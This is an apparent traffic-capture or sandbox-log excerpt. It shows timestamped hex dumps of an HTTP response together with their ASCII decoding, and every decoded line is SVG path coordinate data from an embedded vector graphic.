22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 38 2e 33 35 2c 32 37 37 2e 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35
                                                                                                                                                                                                                                                                          Data Ascii: 11,0,0,1,.15,2.85"></path><path class="cls-4" d="M928.58,284.23a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-1,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M928.35,277.3a1.72,1.72,0,0,1-.78,2.23,2.5
                                                                                                                                                                                                                                                                          2023-07-05 06:07:34 UTC3237INData Raw: 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 33 38 2e 32 31 2c 32 39 33 2e 32 34 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32
                                                                                                                                                                                                                                                                          Data Ascii: .69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M1038.21,293.24a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:34 UTC3253INData Raw: 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 30 37 2e 34 35 2c 32 30 35 2e 34 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68
                                                                                                                                                                                                                                                                          Data Ascii: ,1,3.29.92,2.39,2.39,0,0,1-.5,2.85,2.23,2.23,0,0,1-2.86,0,2.08,2.08,0,0,1-.15-2.81"></path><path class="cls-4" d="M1007.45,205.41a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"></path
                                                                                                                                                                                                                                                                          2023-07-05 06:07:34 UTC3269INData Raw: 2e 35 39 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 37 36 2e 39 33 2c 31 32 34 2e 34 32 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                                          Data Ascii: .59a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"></path><path class="cls-4" d="M976.93,124.42a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.92,2.38,2.38,0,0,1-.51,2.85,2.22,2.22,0,0,1
                                                                                                                                                                                                                                                                          2023-07-05 06:07:34 UTC3285INData Raw: 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 35 39 2e 35 39 2c 32 32 37 2e 35 34 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 35 39 2e 38 32 2c 32 33 34 2e 33 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c
                                                                                                                                                                                                                                                                          Data Ascii: th><path class="cls-4" d="M959.59,227.54a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M959.82,234.37a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:34 UTC3301INData Raw: 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 39 2e 30 36 2c 31 34 36 2e 35 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 39 2e 33 2c 31 35 33 2e 33 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32
                                                                                                                                                                                                                                                                          Data Ascii: 08,2.08,0,0,1-.15-2.81"></path><path class="cls-4" d="M929.06,146.54a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.37,2.37,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"></path><path class="cls-4" d="M929.3,153.37a1.69,1.69,0,0,1,.76-2.2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:34 UTC3317INData Raw: 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 31 32 2c 32 35 36 2e 35 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 31 32 2e 31 38 2c 32 36 33 2e 33 33 61 31 2e 37 31 2c
                                                                                                                                                                                                                                                                          Data Ascii: ,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"></path><path class="cls-4" d="M912,256.5a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"></path><path class="cls-4" d="M912.18,263.33a1.71,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:34 UTC3333INData Raw: 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 38 31 2e 34 33 2c 31 37 35 2e 35 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61
                                                                                                                                                                                                                                                                          Data Ascii: ,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M881.43,175.5a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"></path><path cla
                                                                                                                                                                                                                                                                          2023-07-05 06:07:34 UTC3349INData Raw: 37 2d 32 2e 32 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 36 34 2e 33 31 2c 32 38 35 2e 34 35 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c
                                                                                                                                                                                                                                                                          Data Ascii: 7-2.2,2.49,2.49,0,0,1,3.29.93,2.37,2.37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"></path><path class="cls-4" d="M864.31,285.45a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.09,2.09,0,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:35 UTC3365INData Raw: 2d 34 22 20 64 3d 22 4d 38 33 33 2e 35 36 2c 31 39 37 2e 36 33 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 33 2e 37 39 2c 32 30 34 2e 34 36 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 31 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c
                                                                                                                                                                                                                                                                          Data Ascii: -4" d="M833.56,197.63a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"></path><path class="cls-4" d="M833.79,204.46a1.71,1.71,0,0,1,.77-2.21,2.49,2.49,0,0,1,3.29.93,2.37,2.37,0,0,1-.51,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:35 UTC3381INData Raw: 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 31 36 2e 34 34 2c 33 30 37 2e 35 38 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 33 2e 32 37 2c 31 32 33 2e 34 36 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32
                                                                                                                                                                                                                                                                          Data Ascii: ></path><path class="cls-4" d="M816.44,307.58a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.29.93,2.38,2.38,0,0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.1,2.1,0,0,1-.15-2.82"></path><path class="cls-4" d="M803.27,123.46a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:35 UTC3397INData Raw: 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 38 35 2e 39 32 2c 32 32 36 2e 35 38 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 38 36 2e 31 35 2c 32 33 33 2e 34 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c
                                                                                                                                                                                                                                                                          Data Ascii: 8,0,0,1-.15-2.81"></path><path class="cls-4" d="M785.92,226.58a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"></path><path class="cls-4" d="M786.15,233.41a1.7,1.7,0,0,1,.77-2.2,2.48,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:35 UTC3413INData Raw: 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 32 2c 32 36 37 2e 33 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22
                                                                                                                                                                                                                                                                          Data Ascii: 81,0,0,1-3.72-1.05,2.68,2.68,0,0,1,.57-3.21,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M522,267.3a1.91,1.91,0,0,1-.87,2.48,2.81,2.81,0,0,1-3.72-1,2.69,2.69,0,0,1,.57-3.22,2.52,2.52,0,0,1,3.23,0,2.37,2.37,0,0,1,.17,3.18"
                                                                                                                                                                                                                                                                          2023-07-05 06:07:35 UTC3429INData Raw: 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 34 31 2e 38 34 2c 31 35 38 2e 34 37 41 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2c 35 34 31 2c 31 36 31 61 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 34 31 2e 35 38 2c 31 35 30 2e 37 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: 18,3.18"></path><path class="cls-7" d="M541.84,158.47A1.92,1.92,0,0,1,541,161a2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M541.58,150.76a1.91,1.91,0,0,1-.87,2.48,2.79,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:35 UTC3445INData Raw: 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 37 36 2e 35 39 2c 32 35 37 2e 37 32 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36
                                                                                                                                                                                                                                                                          Data Ascii: ,0,1-.86,2.49,2.81,2.81,0,0,1-3.72-1.05,2.68,2.68,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.34,2.34,0,0,1,.18,3.17"></path><path class="cls-7" d="M576.59,257.72a1.91,1.91,0,0,1-.86,2.49,2.8,2.8,0,0,1-3.72-1,2.68,2.68,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36
                                                                                                                                                                                                                                                                          2023-07-05 06:07:35 UTC3461INData Raw: 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 36 2e 34 36 2c 31 34 38 2e 39 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 36 2e 32 2c 31 34 31 2e 31 38 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32
                                                                                                                                                                                                                                                                          Data Ascii: 0,1,.17,3.18"></path><path class="cls-7" d="M596.46,148.9a1.92,1.92,0,0,1-.87,2.49,2.81,2.81,0,0,1-3.72-1,2.69,2.69,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M596.2,141.18a1.92,1.92,0,0,1-.87,2.49,2.81,2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:35 UTC3477INData Raw: 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 33 31 2e 32 31 2c 32 34 38 2e 31 35 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 3e
                                                                                                                                                                                                                                                                          Data Ascii: 79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"></path><path class="cls-7" d="M631.21,248.15a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.17">
                                                                                                                                                                                                                                                                          2023-07-05 06:07:35 UTC3493INData Raw: 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 35 31 2e 30 37 2c 31 33 39 2e 33 33 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 35 30 2e 38 31 2c 31 33 31 2e 36 31 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38
